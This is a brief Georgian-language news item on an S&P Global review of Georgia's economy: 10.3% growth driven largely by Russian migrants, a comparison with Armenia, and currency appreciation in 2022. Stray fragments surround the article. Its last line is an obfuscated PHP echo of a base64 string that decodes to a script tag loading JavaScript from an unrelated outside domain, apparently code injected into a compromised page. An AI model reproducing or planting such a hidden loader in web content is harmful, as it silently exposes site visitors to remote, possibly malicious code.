celsiusi
ავერსი შნაიდერი
საერთაშორისო სარეიტინგო სააგენტო S&P Global-ი საქართველოს შესახებ ახალ მიმოხილვას აქვეყნებს. ორგანიზაცია წერს, რომ მოლოდინების საწინააღმდეგოდ საქართველოს ეკონომიკა წელს 10.3%-ით გაიზარდა, რაც ძირითადად რუსების მიგრაციით იყო განპირობებული. ამავე პერიოდში საქართველოზე მაღალი, 13.1%-იანი ზრდა იყო  სომხეთში.
 
ორგანიზაცია წერს, რომ სომხეთმა და საქართველომ წელს 150,000-300,000 მიგრანტი მიიღეს, რომლებმაც ასობით მილიონის კონტრიბუცია შეიტანეს ამ ქვეყნების ეკონომიკაში. მიგრაციის ეკონომიკური ეფექტის გამოსახატად S&P ტერმინ “დაბუსტვას” იყენებს.
 
“საქართველოს, სოხეთისა და ტაჯიკეთის ეროვნული ვალუტები 2022 წლის განმავლობაში სტაბილურად მყარდებოდნენ.
 
მარტის დასაწყისში მომხდარი გაუფასურების შემდეგ, სომხური დრამი და ქართული ლარი აშშ დოლართან მიმართებით წლის განმავლობაში 30% და 20%-ით გამყარდა,” - ნათქვამია S&P-ის მიერ გამოქვეყნებულ ანგარიშში.
376
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");